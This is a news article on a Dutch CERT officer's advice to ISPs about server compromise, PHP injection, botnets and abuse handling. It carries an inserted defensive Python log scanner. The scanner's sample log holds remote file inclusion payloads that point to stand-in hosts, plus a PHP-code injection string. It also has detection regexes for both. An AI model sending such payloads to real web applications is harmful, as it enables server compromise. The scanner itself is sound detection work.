Lax ISPs add to Internet security problem

Open source tools and content systems remain vulnerable.

If ISPs are not trying to be part of the Internet security solution then they are part of the problem and customers should vote with their feet, according to a security officer of a European communications and hosting company.

Scott McIntyre is one of six security officers at KPN-CERT, the Dutch equivalent to AusCERT, and is visiting Australia for the annual conference.

McIntyre believes there is a clear business case for ISPs developing a security practice and a lot of ISPs in Europe are adopting KPN-CERT's practices.

"There is plenty of evil out there and as a provider we have a role to play, like consumers, vendors, and the government," McIntyre said.

McIntyre believes providers should want to invest in security to protect their reputation, and responsible collaboration yields positive results.

He also offered a pragmatic solution: "If you burn the Internet and start over everything will be just fine!"

Given that's unlikely to happen, McIntyre offered a number of recommendations ISPs can adopt to reduce the threat to their hosting customers.

"Public enemy number one are the servers you are running," he said. "Most Windows installs are administered from Russia or Romania via a few gateways.

"I have to check every system we have and everything is run on FreeBSD."

McIntyre runs scripts to determine if rogue software is running on his machines and "on a good day" there is one unknown process, but the average may be six or so and the customers don't know about it.

The top server threats revolve around malware based on PHP injection and Perl code, and iframe-based attacks are an increasing trend.

"We've seen tens of thousands of types of malware and now can see over 250,000 against one Web site in one week. They are looking for vulnerable content systems like Joomla," McIntyre said.

Every day McIntyre and his team scan through access logs looking for malicious code, and they can identify PHP injection attacks.

"If you look - even if you are not vulnerable - it's good intelligence to see what the bad guys are up to," he said. "I take the IP addresses and send them to organizations like AusCERT so we make sure others are aware of the problems."
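The kind of access-log check described above, as an added example that is not McIntyre's or KPN-CERT's own code: it parses constructed Apache combined-format lines, flags requests whose parameters carry a PHP open tag or point at a script on a remote host (the remote file inclusion pattern used against PHP content systems), and collects the distinct source addresses that would be passed on to a CERT. The log lines, IP addresses and regular expressions are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache "combined" format; not taken from the article.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2008:10:02:11 +1000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/May/2008:10:02:15 +1000] "GET /index.php?option=com_foo&mosConfig_absolute_path=http://198.51.100.9/cmd.txt? HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/May/2008:10:02:16 +1000] "GET /components/com_bar/bar.php?file=ftp://203.0.113.99/evil.php HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
192.0.2.44 - - [12/May/2008:10:03:01 +1000] "GET /page.php?q=%3C%3Fphp%20echo%201%3B%20%3F%3E HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
192.0.2.50 - - [12/May/2008:10:04:40 +1000] "GET /search.php?q=http%3A%2F%2Fexample.com%2F HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Remote file inclusion payloads point a parameter at a script or text file on another
# host, usually with a trailing '?' so anything PHP appends becomes a query string.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://[^/]+/.*(?:\.(?:txt|php|gif|jpg)(?:\?.*)?|\?)$', re.I)


def classify(target):
    """Return a reason if the request target looks like a PHP injection attempt, else None."""
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):  # values are percent-decoded here
        if '<?' in value:                       # PHP open tag smuggled in a parameter
            return f'php code in parameter {name!r}'
        if REMOTE_RE.match(value):              # parameter points at a remote script
            return f'remote file inclusion via {name!r}'
    return None                                 # a plain URL typed into a search box is left alone


def scan(log_text):
    """Parse each line and keep only the suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                            # unparseable line: skip it rather than crash
        reason = classify(m['target'])
        if reason:
            findings.append({'ip': m['ip'], 'ts': m['ts'], 'target': m['target'],
                             'ua': m['ua'], 'reason': reason})
    return findings


def source_ips(findings):
    """Distinct attacking addresses, the list one would pass on to a CERT."""
    return sorted({f['ip'] for f in findings})


if __name__ == '__main__':
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h['ip'], h['reason'], h['target'])
    print('report:', ', '.join(source_ips(hits)))
```

The last sample line shows the caveat: a search query that merely contains a URL is not flagged, because only parameter values that look like a fetchable script (or end in the tell-tale `?`) count.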

Last year McIntyre saw fewer than 8,000 bad URLs, and this year alone the team has seen over 6,000; "every one of those servers is owned by the bad guys".

"They have very user friendly HTTP-based malware to compromise systems, it is just a little bit of Perl and PHP. It was written in Russian but they translated it into English."

In another phishing case a customer was compromised with a PHP injection and Perl bots were installed.

"I looked around and found five more phishers and the customer removed the site and said they fixed the plug, but the phishers returned," McIntyre said. "It turned out every day the customer was re-uploading the phishing sites and restoring them from a backup."

There is certainly no shortage of bots as McIntyre runs a number of "botpots" based on Unix to attract bots.

This year botpot One has seen some 29,000 bots so far, botpot Two about 200,000, and botpot Three just under a million systems from all over the world.

"The point is we are proactive and if you are not contributing in some way you are making it worse for the Internet," he said. "There is plenty of malware out there and the script kiddies are out there, but the big guys are doing it for the money. It's worrying how much information is out there and how cheap it is. The underground economy is rife with this stuff."

Web-based e-mail systems are now being targeted as well; the known attack is sent around the world with a one to two percent success rate, but even that is enough.

What else can ISPs do to keep customer accounts secure? Well, according to McIntyre the overall procedure is quite simple.

"We find the problem and we are looking for the trouble," he said. "We have a notification ritual telling people they have a problem and we give them free anti-virus tools and try to make the bar as low as possible."

They also use a ticketing system for abuse matters and if your ISP doesn't have one "run away".

"We also created a walled garden environment where the customer can get information online without being put at risk," McIntyre said. "We use policy-based routing for HTTP content and have firewall rules in the router that limit customer traffic."

McIntyre's team is now developing some custom filters as a preventative measure.

"We want to prevent the bot from becoming a spam relay. It is not being used for abuse handling and not based on DPI, it's purely port-based," he said. "I've got 120Gbps of traffic so show me the hardware that can do DPI on that at less than the cost of Australia!"